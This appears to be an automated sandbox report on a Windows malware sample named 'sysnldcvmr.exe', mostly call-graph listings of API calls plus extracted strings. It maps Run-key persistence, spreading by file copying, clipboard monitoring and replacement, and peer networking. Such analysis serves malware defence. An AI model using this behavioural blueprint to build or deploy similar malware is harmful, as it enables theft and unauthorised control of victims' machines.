FindFirstFileW 5292->5298 5295 406809 PathFileExistsW 5293->5295 5296 4067ea SetFileAttributesW DeleteFileW 5293->5296 5299 40678e 5294->5299 5302 40681a CreateDirectoryW 5295->5302 5303 40683c PathFileExistsW 5295->5303 5296->5295 5304 4068a5 5297->5304 5305 40688d 5297->5305 5298->5301 5323 4068f1 5298->5323 5299->5291 5300 4067a5 SetFileAttributesW DeleteFileW 5299->5300 5300->5291 5301->5265 5302->5303 5308 40682d SetFileAttributesW 5302->5308 5303->5292 5309 40684d CopyFileW 5303->5309 5306 406460 3 API calls 5304->5306 5330 406460 CoInitialize CoCreateInstance 5305->5330 5311 4068a0 SetFileAttributesW 5306->5311 5307 4069b3 lstrcmpW 5312 4069c9 lstrcmpW 5307->5312 5307->5323 5308->5303 5309->5292 5313 406865 SetFileAttributesW 5309->5313 5311->5298 5312->5323 5313->5292 5315 406b8a FindNextFileW 5315->5307 5316 406ba6 FindClose 5315->5316 5316->5301 5317 406a0f lstrcmpiW 5317->5323 5318 406a76 PathMatchSpecW 5320 406a97 wsprintfW SetFileAttributesW DeleteFileW 5318->5320 5318->5323 5319 406af4 PathFileExistsW 5321 406b0a wsprintfW wsprintfW 5319->5321 5319->5323 5320->5323 5322 406b74 MoveFileExW 5321->5322 5321->5323 5322->5315 5323->5307 5323->5315 5323->5317 5323->5318 5323->5319 5334 406570 CreateDirectoryW wsprintfW FindFirstFileW 5323->5334 5326 4062ff 5325->5326 5327 406348 5325->5327 5326->5283 5326->5287 5327->5326 5328 40635c QueryDosDeviceW 5327->5328 5328->5326 5329 406376 StrCmpNW 5328->5329 5329->5326 5331 406496 5330->5331 5333 4064d2 5330->5333 5332 4064a0 wsprintfW 5331->5332 5331->5333 5332->5333 5333->5311 5335 4065c5 lstrcmpW 5334->5335 5336 40669f 5334->5336 5337 4065f1 5335->5337 5338 4065db lstrcmpW 5335->5338 5336->5323 5340 40666c FindNextFileW 5337->5340 5338->5337 5339 4065f3 wsprintfW wsprintfW 5338->5339 5339->5337 5341 406656 MoveFileExW 5339->5341 5340->5335 5342 406688 FindClose RemoveDirectoryW 5340->5342 5341->5340 5342->5336 5352 40d0d0 5357 401b60 5352->5357 5354 40d0e5 5355 40d104 5354->5355 5356 401b60 16 API calls 5354->5356 5356->5355 5358 401c42 5357->5358 5359 401b70 5357->5359 5358->5354 5359->5358 5360 409d90 7 API calls 5359->5360 5361 401b9d 5360->5361 5361->5358 5362 40a220 8 API calls 5361->5362 5363 401bc9 5362->5363 5364 401be6 5363->5364 5365 401bd6 5363->5365 5377 401ae0 WSASend 5364->5377 5367 40a1b0 _invalid_parameter 3 API calls 5365->5367 5368 401bdc 5367->5368 5368->5354 5369 401bf3 5370 401c33 5369->5370 5371 401bfc EnterCriticalSection 5369->5371 5374 40a1b0 _invalid_parameter 3 API calls 5370->5374 5372 401c13 5371->5372 5373 401c1f LeaveCriticalSection 5371->5373 5372->5373 5373->5354 5375 401c3c 5374->5375 5376 40a1b0 _invalid_parameter 3 API calls 5375->5376 5376->5358 5378 401b50 5377->5378 5379 401b12 WSAGetLastError 5377->5379 5378->5369 5379->5378 5380 401b1f 5379->5380 5381 401b56 5380->5381 5382 401b26 Sleep WSASend 5380->5382 5381->5369 5382->5378 5382->5379 5383 40d4d0 5386 40b570 5383->5386 5394 40b581 5386->5394 5388 40b59f 5390 40a1b0 _invalid_parameter 3 API calls 5388->5390 5391 40b94f 5390->5391 5392 40b960 21 API calls 5392->5394 5394->5388 5394->5392 5396 40b520 13 API calls 5394->5396 5397 40ae80 31 API calls 5394->5397 5400 40bab0 5394->5400 5407 40b250 EnterCriticalSection 5394->5407 5412 406e90 5394->5412 5417 406f30 5394->5417 5422 406d60 5394->5422 5429 406e60 5394->5429 5396->5394 5397->5394 5401 40bac1 lstrlenA 5400->5401 5402 40c190 7 API calls 5401->5402 5406 40badf 5402->5406 5403 40baeb 5404 40bb6f 5403->5404 5405 40a1b0 _invalid_parameter 3 API calls 5403->5405 5404->5394 5405->5404 5406->5401 5406->5403 5408 40b268 5407->5408 5409 40b2a4 LeaveCriticalSection 5408->5409 5432 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5408->5432 5409->5394 5411 40b293 5411->5409 5433 406ed0 5412->5433 5415 40d160 16 API calls 5416 406ec9 5415->5416 5416->5394 5418 406ed0 75 API calls 5417->5418 5419 406f4f 5418->5419 5420 406f7c 5419->5420 5448 406f90 5419->5448 5420->5394 5459 405fa0 EnterCriticalSection 5422->5459 5424 406dad 5424->5394 5425 406d7a 5425->5424 5464 406dc0 5425->5464 5428 40a1b0 _invalid_parameter 3 API calls 5428->5424 5471 406060 EnterCriticalSection 5429->5471 5431 406e82 5431->5394 5432->5411 5434 406ee3 5433->5434 5436 406ea4 5434->5436 5437 405eb0 EnterCriticalSection 5434->5437 5436->5415 5436->5416 5438 40c820 71 API calls 5437->5438 5439 405ece 5438->5439 5440 405f8b LeaveCriticalSection 5439->5440 5441 405ee7 5439->5441 5443 405f08 5439->5443 5440->5434 5442 405ef1 memcpy 5441->5442 5447 405f06 5441->5447 5442->5447 5446 405f66 memcpy 5443->5446 5443->5447 5444 40a1b0 _invalid_parameter 3 API calls 5445 405f88 5444->5445 5445->5440 5446->5447 5447->5444 5451 40b480 5448->5451 5452 40bf00 3 API calls 5451->5452 5453 40b48b 5452->5453 5454 40b4a7 lstrlenA 5453->5454 5455 40c190 7 API calls 5454->5455 5456 40b4dd 5455->5456 5457 406fd5 5456->5457 5458 40a1b0 _invalid_parameter 3 API calls 5456->5458 5457->5420 5458->5457 5460 405fbe 5459->5460 5461 40604a LeaveCriticalSection 5460->5461 5462 40a220 8 API calls 5460->5462 5461->5425 5463 40601c 5462->5463 5463->5461 5465 409fa0 __aligned_recalloc_base 7 API calls 5464->5465 5466 406dd2 memcpy 5465->5466 5467 40b480 13 API calls 5466->5467 5468 406e3c 5467->5468 5469 40a1b0 _invalid_parameter 3 API calls 5468->5469 5470 406da1 5469->5470 5470->5428 5496 40c880 5471->5496 5474 4062a3 LeaveCriticalSection 5474->5431 5475 40c820 71 API calls 5476 406099 5475->5476 5476->5474 5477 4061b8 5476->5477 5478 4060f4 memcpy 5476->5478 5479 4061e1 5477->5479 5480 405cf0 68 API calls 5477->5480 5481 40a1b0 _invalid_parameter 3 API calls 5478->5481 5482 40a1b0 _invalid_parameter 3 API calls 5479->5482 5480->5479 5483 406118 5481->5483 5484 406202 5482->5484 5485 40a220 8 API calls 5483->5485 5484->5474 5486 406211 CreateFileW 5484->5486 5487 406128 5485->5487 5486->5474 5488 406234 5486->5488 5489 40a1b0 _invalid_parameter 3 API calls 5487->5489 5491 406251 WriteFile 5488->5491 5492 40628f FlushFileBuffers 5488->5492 5490 40614f 5489->5490 5493 40c190 7 API calls 5490->5493 5491->5488 5492->5474 5494 406185 5493->5494 5495 407310 64 API calls 5494->5495 5495->5477 5499 40bdd0 5496->5499 5504 40bde1 5499->5504 5500 40a220 8 API calls 5500->5504 5501 40bd30 70 API calls 5501->5504 5502 40a1b0 _invalid_parameter 3 API calls 5503 406082 5502->5503 5503->5474 5503->5475 5504->5500 5504->5501 5505 407af0 68 API calls 5504->5505 5506 40bdfb 5504->5506 5507 40be3b memcmp 5504->5507 5505->5504 5506->5502 5507->5504 5507->5506 5508 40cf50 5509 40cfbe 5508->5509 5510 40cf66 5508->5510 5510->5509 5511 40cf70 5510->5511 5512 40cfc3 5510->5512 5513 40d013 5510->5513 5514 409d90 7 API calls 5511->5514 5516 40cfe8 5512->5516 5517 40cfdb InterlockedDecrement 5512->5517 5542 40bbc0 5513->5542 5518 40cf7d 5514->5518 5519 40a1b0 _invalid_parameter 3 API calls 5516->5519 5517->5516 5531 4023d0 5518->5531 5521 40cff4 5519->5521 5523 40a1b0 _invalid_parameter 3 API calls 5521->5523 5523->5509 5525 40d039 5525->5509 5528 40d071 IsBadReadPtr 5525->5528 5530 40b570 184 API calls 5525->5530 5547 40bcc0 5525->5547 5527 40cfab InterlockedIncrement 5527->5509 5528->5525 5530->5525 5532 402413 5531->5532 5533 4023d9 5531->5533 5535 40ad40 5532->5535 5533->5532 5534 4023ea InterlockedIncrement 5533->5534 5534->5532 5536 40add0 2 API calls 5535->5536 5537 40ad4f 5536->5537 5538 40ad59 5537->5538 5539 40ad5d EnterCriticalSection 5537->5539 5538->5509 5538->5527 5540 40ad7c LeaveCriticalSection 5539->5540 5540->5538 5543 40bbd3 5542->5543 5544 40bbfd memcpy 5542->5544 5545 409fe0 9 API calls 5543->5545 5544->5525 5546 40bbf4 5545->5546 5546->5544 5548 40bce9 5547->5548 5549 40bcde 5547->5549 5548->5549 5550 40bd01 memmove 5548->5550 5549->5525 5550->5549 5551 401f50 GetQueuedCompletionStatus 5552 401f92 5551->5552 5553 402008 5551->5553 5554 401f97 WSAGetOverlappedResult 5552->5554 5558 401d60 5552->5558 5554->5552 5555 401fb9 WSAGetLastError 5554->5555 5555->5552 5557 401fd3 GetQueuedCompletionStatus 5557->5552 5557->5553 5559 401ef2 InterlockedDecrement setsockopt closesocket 5558->5559 5560 401d74 5558->5560 5562 401e39 5559->5562 5560->5559 5561 401d7c 5560->5561 5578 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5561->5578 5562->5557 5564 401d81 InterlockedExchange 5565 401d98 5564->5565 5566 401e4e 5564->5566 5565->5562 5571 401da9 InterlockedDecrement 5565->5571 5572 401dbc InterlockedDecrement InterlockedExchangeAdd 5565->5572 5567 401e67 5566->5567 5568 401e57 InterlockedDecrement 5566->5568 5569 401e72 5567->5569 5570 401e87 InterlockedDecrement 5567->5570 5568->5557 5573 401ae0 4 API calls 5569->5573 5574 401ee9 5570->5574 5571->5557 5575 401e2f 5572->5575 5576 401e7e 5573->5576 5574->5557 5579 401cf0 5575->5579 5576->5557 5578->5564 5580 401d00 InterlockedExchangeAdd 5579->5580 5581 401cfc 5579->5581 5582 401d53 5580->5582 5583 401d17 InterlockedIncrement 5580->5583 5581->5562 5582->5562 5587 401c50 WSARecv 5583->5587 5585 401d46 5585->5582 5586 401d4c InterlockedDecrement 5585->5586 5586->5582 5588 401cd2 5587->5588 5589 401c8e 5587->5589 5588->5585 5590 401c90 WSAGetLastError 5589->5590 5591 401ca4 Sleep WSARecv 5589->5591 5592 401cdb 5589->5592 5590->5588 5590->5589 5591->5588 5591->5590 5592->5585 5593 40d550 5603 4013b0 5593->5603 5595 40d5dd 5597 40d55d 5597->5595 5598 40d577 InterlockedExchangeAdd 5597->5598 5599 40d5bb WaitForSingleObject 5597->5599 5615 40b200 EnterCriticalSection 5597->5615 5620 40b520 5597->5620 5598->5597 5598->5599 5599->5597 5600 40d5d4 5599->5600 5623 401330 5600->5623 5604 409d90 7 API calls 5603->5604 5605 4013bb CreateEventA socket 5604->5605 5606 4013f2 5605->5606 5610 4013f8 5605->5610 5607 401330 7 API calls 5606->5607 5607->5610 5608 401401 bind 5611 401444 CreateThread 5608->5611 5612 401434 5608->5612 5609 401462 5609->5597 5610->5608 5610->5609 5611->5609 5633 401100 5611->5633 5613 401330 7 API calls 5612->5613 5614 40143a 5613->5614 5614->5597 5616 40b237 LeaveCriticalSection 5615->5616 5617 40b21f 5615->5617 5616->5597 5618 40bec0 3 API calls 5617->5618 5619 40b22a 5618->5619 5619->5616 5621 40b480 13 API calls 5620->5621 5622 40b561 5621->5622 5622->5597 5624 401339 5623->5624 5632 40139b 5623->5632 5625 401341 SetEvent WaitForSingleObject 5624->5625 5624->5632 5628 401362 5625->5628 5626 40138b 5662 40ab40 shutdown closesocket 5626->5662 5628->5626 5629 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5628->5629 5629->5628 5630 401395 5631 40a1b0 _invalid_parameter 3 API calls 5630->5631 5631->5632 5632->5595 5634 401115 ioctlsocket 5633->5634 5635 4011e4 5634->5635 5641 40113a 5634->5641 5636 40a1b0 _invalid_parameter 3 API calls 5635->5636 5638 4011ea 5636->5638 5637 4011cd WaitForSingleObject 5637->5634 5637->5635 5639 409fe0 9 API calls 5639->5641 5640 401168 recvfrom 5640->5637 5640->5641 5641->5637 5641->5639 5641->5640 5642 4011ad InterlockedExchangeAdd 5641->5642 5644 401000 5642->5644 5645 401014 5644->5645 5646 40103b 5645->5646 5647 409d90 7 API calls 5645->5647 5655 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5646->5655 5647->5646 5649 40105b 5656 401580 5649->5656 5651 4010ec 5651->5641 5652 4010a3 IsBadReadPtr 5654 401071 5652->5654 5653 4010d8 memmove 5653->5654 5654->5651 5654->5652 5654->5653 5655->5649 5657 401592 5656->5657 5658 4015a5 memcpy 5656->5658 5659 409fe0 9 API calls 5657->5659 5661 4015c1 5658->5661 5660 40159f 5659->5660 5660->5658 5661->5654 5662->5630 5887 40ca90 5888 40ad40 4 API calls 5887->5888 5889 40caa3 5888->5889 5890 40caba 5889->5890 5892 40cad0 InterlockedExchangeAdd 5889->5892 5893 40caed 5892->5893 5903 40cae6 5892->5903 5909 40cdc0 5893->5909 5896 40cb0d InterlockedIncrement 5906 40cb17 5896->5906 5897 40b520 13 API calls 5897->5906 5898 40cb40 5916 40aa20 inet_ntoa 5898->5916 5900 40cb4c 5901 40cc10 InterlockedDecrement 5900->5901 5917 40ab40 shutdown closesocket 5901->5917 5903->5890 5904 409fa0 __aligned_recalloc_base 7 API calls 5904->5906 5905 40ccf0 6 API calls 5905->5906 5906->5897 5906->5898 5906->5901 5906->5904 5906->5905 5907 40a1b0 _invalid_parameter 3 API calls 5906->5907 5908 40b570 184 API calls 5906->5908 5907->5906 5908->5906 5910 40cdcd socket 5909->5910 5911 40cde2 htons connect 5910->5911 5912 40ce3f 5910->5912 5911->5912 5913 40ce2a 5911->5913 5912->5910 5914 40cafd 5912->5914 5918 40ab40 shutdown closesocket 5913->5918 5914->5896 5914->5903 5916->5900 5917->5903 5918->5914 5919 406c16 5922 406bf8 5919->5922 5920 406d38 Sleep 5920->5922 5921 406c29 5923 4062c0 4 API calls 5921->5923 5922->5920 5922->5921 5924 406d48 ExitThread 5922->5924 5925 4063a0 4 API calls 5922->5925 5927 406c3a 5923->5927 5925->5922 5926 406c60 GetVolumeInformationW GetDiskFreeSpaceExW _aulldiv wsprintfW 5929 406cd6 wsprintfW 5926->5929 5930 406ceb wsprintfW 5926->5930 5927->5926 5928 406c5b 5927->5928 5929->5930 5931 4066b0 51 API calls 5930->5931 5931->5928 5932 40b420 5933 40b423 WaitForSingleObject 5932->5933 5934 40b451 5933->5934 5935 40b43b InterlockedDecrement 5933->5935 5936 40b44a 5935->5936 5936->5933 5937 40ab60 15 API calls 5936->5937 5937->5936 5938 401920 GetTickCount WaitForSingleObject 5939 401ac9 5938->5939 5940 40194d WSAWaitForMultipleEvents 5938->5940 5941 4019f0 GetTickCount 5940->5941 5942 40196a WSAEnumNetworkEvents 5940->5942 5943 401a43 GetTickCount 5941->5943 5944 401a05 EnterCriticalSection 5941->5944 5942->5941 5958 401983 5942->5958 5945 401ab5 WaitForSingleObject 5943->5945 5946 401a4e EnterCriticalSection 5943->5946 5947 401a16 5944->5947 5948 401a3a LeaveCriticalSection 5944->5948 5945->5939 5945->5940 5949 401aa1 LeaveCriticalSection GetTickCount 5946->5949 5950 401a5f InterlockedExchangeAdd 5946->5950 5953 401a29 LeaveCriticalSection 5947->5953 5980 401820 5947->5980 5948->5945 5949->5945 5998 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5950->5998 5951 401992 accept 5951->5941 5951->5958 5953->5945 5955 401a72 5955->5949 5955->5950 5999 40ab40 shutdown closesocket 5955->5999 5958->5941 5958->5951 5959 401cf0 7 API calls 5958->5959 5960 4022c0 5958->5960 5959->5941 5961 4022d2 EnterCriticalSection 5960->5961 5962 4022cd 5960->5962 5963 4022e7 5961->5963 5964 4022fd LeaveCriticalSection 5961->5964 5962->5958 5963->5964 5965 402308 5964->5965 5966 40230f 5964->5966 5965->5958 5967 409d90 7 API calls 5966->5967 5968 402319 5967->5968 5969 402326 getpeername CreateIoCompletionPort 5968->5969 5970 4023b8 5968->5970 5972 4023b2 5969->5972 5973 402366 5969->5973 6002 40ab40 shutdown closesocket 5970->6002 5974 40a1b0 _invalid_parameter 3 API calls 5972->5974 6000 40d4a0 NtQuerySystemTime RtlTimeToSecondsSince1980 5973->6000 5974->5970 5975 4023c3 5975->5958 5977 40236b InterlockedExchange InitializeCriticalSection InterlockedIncrement 6001 4021e0 EnterCriticalSection LeaveCriticalSection 5977->6001 5979 4023ab 5979->5958 5981 401830 5980->5981 5990 40190f 5980->5990 5982 40183d InterlockedExchangeAdd 5981->5982 5981->5990 5983 401854 5982->5983 5982->5990 5984 401880 5983->5984 5983->5990 6003 4017a0 EnterCriticalSection 5983->6003 5988 401891 5984->5988 6012 40ab40 shutdown closesocket 5984->6012 5986 4018a7 InterlockedDecrement 5991 401901 5986->5991 5988->5986 5988->5991 5989 402247 5989->5948 5990->5948 5991->5989 5992 402265 EnterCriticalSection 5991->5992 5993 40229c LeaveCriticalSection DeleteCriticalSection 5992->5993 5996 40227d 5992->5996 5994 40a1b0 _invalid_parameter 3 API calls 5993->5994 5994->5989 5995 40a1b0 GetCurrentProcessId HeapValidate HeapFree _invalid_parameter 5995->5996 5996->5995 5997 40229b 5996->5997 5997->5993 5998->5955 5999->5955 6000->5977 6001->5979 6002->5975 6004 401807 LeaveCriticalSection 6003->6004 6005 4017ba InterlockedExchangeAdd 6003->6005 6004->5983 6006 4017ca LeaveCriticalSection 6005->6006 6007 4017d9 6005->6007 6006->5983 6008 40a1b0 _invalid_parameter 3 API calls 6007->6008 6009 4017fe 6008->6009 6010 40a1b0 _invalid_parameter 3 API calls 6009->6010 6011 401804 6010->6011 6011->6004 6012->5988 6013 40d520 6016 401200 6013->6016 6015 40d542 6017 401314 6016->6017 6018 40121d 6016->6018 6017->6015 6018->6017 6019 409fa0 __aligned_recalloc_base 7 API calls 6018->6019 6020 401247 memcpy htons 6019->6020 6021 4012ed 6020->6021 6022 401297 sendto 6020->6022 6023 40a1b0 _invalid_parameter 3 API calls 6021->6023 6024 4012b6 InterlockedExchangeAdd 6022->6024 6025 4012e9 6022->6025 6027 4012fc 6023->6027 6024->6022 6028 4012cc 6024->6028 6025->6021 6026 40130a 6025->6026 6029 40a1b0 _invalid_parameter 3 API calls 6026->6029 6027->6015 6030 40a1b0 _invalid_parameter 3 API calls 6028->6030 6029->6017 6031 4012db 6030->6031 6031->6015 6032 40e121 6034 40e12a 6032->6034 6033 40e21d 6034->6033 6035 40e193 lstrcmpiW 6034->6035 6036 40e213 SysFreeString 6035->6036 6037 40e1a6 6035->6037 6036->6033 6038 40df10 2 API calls 6037->6038 6040 40e1b4 6038->6040 6039 40e205 6039->6036 6040->6036 6040->6039 6041 40e1e3 lstrcmpiW 6040->6041 6042 40e1f5 6041->6042 6043 40e1fb SysFreeString 6041->6043 6042->6043 6043->6039 5677 405970 GetWindowLongW 5678 405994 5677->5678 5679 4059b6 5677->5679 5680 4059a1 5678->5680 5681 405a27 IsClipboardFormatAvailable 5678->5681 5683 405a06 5679->5683 5684 4059ee SetWindowLongW 5679->5684 5695 4059b1 5679->5695 5687 4059c4 SetClipboardViewer SetWindowLongW 5680->5687 5688 4059a7 5680->5688 5685 405a43 IsClipboardFormatAvailable 5681->5685 5686 405a3a 5681->5686 5682 405ba4 DefWindowProcA 5689 405a0c SendMessageA 5683->5689 5683->5695 5684->5695 5685->5686 5690 405a58 IsClipboardFormatAvailable 5685->5690 5692 405a75 OpenClipboard 5686->5692 5711 405b3c 5686->5711 5687->5682 5691 405b5d RegisterRawInputDevices ChangeClipboardChain 5688->5691 5688->5695 5689->5695 5690->5686 5691->5682 5694 405a85 GetClipboardData 5692->5694 5692->5711 5693 405b45 SendMessageA 5693->5695 5694->5695 5696 405a9d GlobalLock 5694->5696 5695->5682 5696->5695 5697 405ab5 5696->5697 5698 405ac8 5697->5698 5699 405ae9 5697->5699 5700 405afe 5698->5700 5701 405ace 5698->5701 5702 405690 13 API calls 5699->5702 5718 4057b0 5700->5718 5703 405ad4 GlobalUnlock CloseClipboard 5701->5703 5712 405570 5701->5712 5702->5703 5707 405b27 5703->5707 5703->5711 5726 404970 lstrlenW 5707->5726 5710 40a1b0 _invalid_parameter 3 API calls 5710->5711 5711->5693 5711->5695 5713 40557b 5712->5713 5714 405581 lstrlenW 5713->5714 5715 405594 5713->5715 5716 409fa0 __aligned_recalloc_base 7 API calls 5713->5716 5717 4055b1 lstrcpynW 5713->5717 5714->5713 5714->5715 5715->5703 5716->5713 5717->5713 5717->5715 5723 4057bd 5718->5723 5719 4057c3 lstrlenA 5719->5723 5724 4057d6 5719->5724 5720 405630 2 API calls 5720->5723 5721 409fa0 __aligned_recalloc_base 7 API calls 5721->5723 5723->5719 5723->5720 5723->5721 5723->5724 5725 40a1b0 _invalid_parameter 3 API calls 5723->5725 5760 405760 5723->5760 5724->5703 5725->5723 5727 4049a4 5726->5727 5729 404c00 5727->5729 5735 404d30 StrStrW 5727->5735 5756 404bee 5727->5756 5728 404dbb StrStrW 5730 404dd2 StrStrW 5728->5730 5731 404dce 5728->5731 5729->5728 5729->5756 5732 404de5 5730->5732 5733 404de9 StrStrW 5730->5733 5731->5730 5732->5733 5734 404dfc 5733->5734 5742 404e12 5734->5742 5765 4048a0 lstrlenW 5734->5765 5735->5729 5737 404d58 StrStrW 5735->5737 5737->5729 5738 404d80 StrStrW 5737->5738 5738->5729 5739 40539b StrStrW 5740 4053b7 StrStrW 5739->5740 5746 4053ae StrStrW 5739->5746 5741 4053d3 StrStrW 5740->5741 5740->5746 5741->5746 5742->5739 5742->5746 5742->5756 5744 405470 StrStrW 5747 405483 5744->5747 5748 40548a StrStrW 5744->5748 5745 405469 5745->5744 5746->5744 5746->5745 5747->5748 5749 4054a4 StrStrW 5748->5749 5750 40549d 5748->5750 5751 4054b7 5749->5751 5752 4054be StrStrW 5749->5752 5750->5749 5751->5752 5753 4054d1 5752->5753 5754 4054d8 lstrlenA 5752->5754 5753->5754 5755 4054eb GlobalAlloc 5754->5755 5754->5756 5755->5756 5757 405506 GlobalLock 5755->5757 5756->5710 5757->5756 5758 405519 memcpy GlobalUnlock OpenClipboard 5757->5758 5758->5756 5759 405546 EmptyClipboard SetClipboardData CloseClipboard 5758->5759 5759->5756 5761 40576b 5760->5761 5762 405771 lstrlenA 5761->5762 5763 405630 2 API calls 5761->5763 5764 4057a4 5761->5764 5762->5761 5763->5761 5764->5723 5768 4048c4 5765->5768 5766 40490d 5766->5742 5767 404911 iswalpha 5767->5768 5769 40492c iswdigit 5767->5769 5768->5766 5768->5767 5768->5769 5769->5768 5770 40d5f0 5776 401470 5770->5776 5772 40d604 5773 40d615 WaitForSingleObject 5772->5773 5775 40d62f 5772->5775 5774 401330 7 API calls 5773->5774 5774->5775 5777 401483 5776->5777 5778 401572 5776->5778 5777->5778 5779 409d90 7 API calls 5777->5779 5778->5772 5780 401498 CreateEventA socket 5779->5780 5781 4014d5 5780->5781 5782 4014cf 5780->5782 5781->5778 5784 4014e2 htons setsockopt bind 5781->5784 5783 401330 7 API calls 5782->5783 5783->5781 5785 401546 5784->5785 5786 401558 CreateThread 5784->5786 5787 401330 7 API calls 5785->5787 5786->5778 5789 401100 20 API calls _invalid_parameter 5786->5789 5788 40154c 5787->5788 5788->5772 6044 40cc30 6049 40cc90 6044->6049 6047 40cc5e 6048 40cc90 send 6048->6047 6050 40cca1 send 6049->6050 6051 40cc43 6050->6051 6052 40ccbe 6050->6052 6051->6047 6051->6048 6052->6050 6052->6051 6053 40ceb0 6054 40ceb4 6053->6054 6055 40b200 5 API calls 6054->6055 6056 40ced0 WaitForSingleObject 6054->6056 6057 40cad0 198 API calls 6054->6057 6058 40cef5 6054->6058 6055->6054 6056->6054 6056->6058 6057->6054 5790 40ee74 5791 40ee7c 5790->5791 5792 40ef30 5791->5792 5796 40f0b1 5791->5796 5795 40eeb5 5795->5792 5800 40ef9c RtlUnwind 5795->5800 5798 40f0c6 5796->5798 5799 40f0e2 5796->5799 5797 40f151 NtQueryVirtualMemory 5797->5799 5798->5797 5798->5799 5799->5795 5801 40efb4 5800->5801 5801->5795 6059 406a39 6061 4069df 6059->6061 6060 406a0f lstrcmpiW 6060->6061 6061->6060 6062 406b8a FindNextFileW 6061->6062 6063 406a76 PathMatchSpecW 6061->6063 6066 406af4 PathFileExistsW 6061->6066 6072 406570 11 API calls 6061->6072 6064 4069b3 lstrcmpW 6062->6064 6065 406ba6 FindClose 6062->6065 6063->6061 6067 406a97 wsprintfW SetFileAttributesW DeleteFileW 6063->6067 6064->6061 6068 4069c9 lstrcmpW 6064->6068 6069 406bb3 6065->6069 6066->6061 6070 406b0a wsprintfW wsprintfW 6066->6070 6067->6061 6068->6061 6070->6061 6071 406b74 MoveFileExW 6070->6071 6071->6062 6072->6061 5802 40757a ExitThread 5803 40ee7c 5804 40ee9a 5803->5804 5806 40ef30 5803->5806 5805 40f0b1 NtQueryVirtualMemory 5804->5805 5808 40eeb5 5805->5808 5807 40ef9c RtlUnwind 5807->5808 5808->5806 5808->5807 5809 405f7d 5810 405f11 5809->5810 5811 405f7b 5810->5811 5814 405f66 memcpy 5810->5814 5812 40a1b0 _invalid_parameter 3 API calls 5811->5812 5813 405f88 LeaveCriticalSection 5812->5813 5814->5811

                                                                    Executed Functions

                                                                    Function 00407590 Relevance: 114.1, APIs: 50, Strings: 15, Instructions: 351sleepfilesynchronizationCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    APIs
                                                                    • Sleep.KERNELBASE(00000BB8), ref: 0040759E
                                                                    • CreateMutexA.KERNELBASE(00000000,00000000,753f85d83d), ref: 004075AD
                                                                    • GetLastError.KERNEL32 ref: 004075B9
                                                                    • ExitProcess.KERNEL32 ref: 004075C8
                                                                    • GetModuleFileNameW.KERNEL32(00000000,00416268,00000105), ref: 00407602
                                                                    • PathFindFileNameW.SHLWAPI(00416268), ref: 0040760D
                                                                    • wsprintfW.USER32 ref: 0040762A
                                                                    • DeleteFileW.KERNEL32(?), ref: 0040763A
                                                                    • ExpandEnvironmentStringsW.KERNEL32(%userprofile%,?,00000104), ref: 00407651
                                                                    • wcscmp.NTDLL ref: 00407663
                                                                    • ExitProcess.KERNEL32 ref: 00407682
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.1635127951.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000007.00000002.1635111443.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635146545.0000000000410000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                    • Associated: 00000007.00000002.1635164093.0000000000414000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_400000_sysnldcvmr.jbxd
                                                                    Similarity
                                                                    • API ID: File$ExitNameProcess$CreateDeleteEnvironmentErrorExpandFindLastModuleMutexPathSleepStringswcscmpwsprintf
                                                                    • String ID: %s:Zone.Identifier$%s\%s$%s\%s$%s\%s$%s\tbtcmds.dat$%s\tbtnds.dat$%temp%$%userprofile%$%windir%$753f85d83d$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Windows Settings$sysnldcvmr.exe
                                                                    • API String ID: 4172876685-2783337622
                                                                    • Opcode ID: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                    • Instruction ID: e42dc10877dc27750cdf455f3f1a43eebb5fa16e92bd93e31d1e2fde4cabc692
                                                                    • Opcode Fuzzy Hash: a1d6fff7326ce72d0d35a9766f0f00425a4457401a86cf5fdb87ec0beecc7a9e
                                                                    • Instruction Fuzzy Hash: 50D1B6B1A80314BBE720ABA0DC4AFD93734AB48B05F1085B5F709B50D1DAF9A6C4CB5D

                                                                    Non-executed Functions

                                                                    Function 004066B0 Relevance: 79.1, APIs: 35, Strings: 10, Instructions: 305fileCOMMON
                                                                    Download Yara Rule

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 59 4066b0-4066c5 _chkstk 60 4066c7-4066c9 59->60 61 4066ce-406780 wsprintfW * 5 PathFileExistsW 59->61 62 406bb9-406bbc 60->62 63 406782-4067a3 call 40e770 61->63 64 4067c4-4067d3 PathFileExistsW 61->64 63->64 73 4067a5-4067be SetFileAttributesW DeleteFileW 63->73 65 406874-406883 PathFileExistsW 64->65 66 4067d9-4067e8 PathFileExistsW 64->66 70 406885-40688b 65->70 71 4068ca-4068eb FindFirstFileW 65->71 68 406809-406818 PathFileExistsW 66->68 69 4067ea-406803 SetFileAttributesW DeleteFileW 66->69 76 40681a-40682b CreateDirectoryW 68->76 77 40683c-40684b PathFileExistsW 68->77 69->68 78 4068a5-4068b8 call 406460 70->78 79 40688d-4068a3 call 406460 70->79 74 4068f1-4069a9 71->74 75 406bb3 71->75 73->64 81 4069b3-4069c7 lstrcmpW 74->81 75->62 76->77 82 40682d-406836 SetFileAttributesW 76->82 77->65 83 40684d-406863 CopyFileW 77->83 90 4068bb-4068c4 SetFileAttributesW 78->90 79->90 86 4069c9-4069dd lstrcmpW 81->86 87 4069df 81->87 82->77 83->65 88 406865-40686e SetFileAttributesW 83->88 86->87 91 4069e4-4069f5 86->91 92 406b8a-406ba0 FindNextFileW 87->92 88->65 90->71 93 406a06-406a0d 91->93 94 4069f7-406a00 91->94 92->81 95 406ba6-406bad FindClose 92->95 96 406a3b-406a44 93->96 97 406a0f-406a2c 